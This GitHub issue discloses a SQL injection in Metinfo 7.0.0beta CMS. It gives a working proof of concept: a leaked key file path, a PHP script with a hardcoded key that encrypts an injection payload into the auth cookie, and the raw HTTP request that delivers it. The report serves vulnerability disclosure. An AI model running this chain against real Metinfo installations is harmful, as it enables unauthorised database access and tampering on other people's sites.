Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Metinfo7.0 SQL Injection #2

Open
SZFsir opened this issue Nov 7, 2019 · 0 comments
Open

Metinfo7.0 SQL Injection #2

SZFsir opened this issue Nov 7, 2019 · 0 comments

Comments

@SZFsir
Copy link
Owner

SZFsir commented Nov 7, 2019

Vulnerability Name: Metinfo7.0.0beta CMS SQL Injection
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0beta
Version: V7.0.0

To demonstrate this vuln, follow three steps below.

First, Get the key

Metinfo disclosure the key by /config/config_safe.php
图片

Then, encrypt the payload

Metinfo7.0 Use encrypt cookie to auth login.
We can see it use user input as auth and key to pass it to login_by_auth function
图片
In login_by_auth function, It use getauth function decode the auth data by the key we input.
图片
And then in login_by_password pass the username(sql inject payload) and then cause sqli
We have the key, and we know the way to encrypt data. As below

function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){
    $ckey_length = 4;  
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya.md5($keya.$keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    for($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if($operation == 'DECODE') {
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
           return substr($result, 26);
        } else {
           return '';
        }
    }else{
        return $keyc.str_replace('=', '', base64_encode($result));
    }
}

echo var_dump($argv[1]);
echo urlencode(authcode($argv[1]."\t1234",'ENCODE','dxeOfyLMbaJiK7SBzT8UC3kiwRNOdKoY'.'abcd'));

图片

Finally, send the payload

(You should encrypt the data first)

GET /metinfo/7.0beta/index.php HTTP/1.1
Host: 127.0.0.1:7000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh,en;q=0.5
Origin: http://127.0.0.1:7000
Connection: close
Cookie: acc_auth=747cs0xMOG3WQ%2BgyHeTJbp%2BF1SszYl9LAOw36gTFpMmAnePPnoQCr%2FLtzbnD8tOg1WdylIQ; acc_key=abcd;
Content-Length: 0

(execute the sql twice)
图片

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant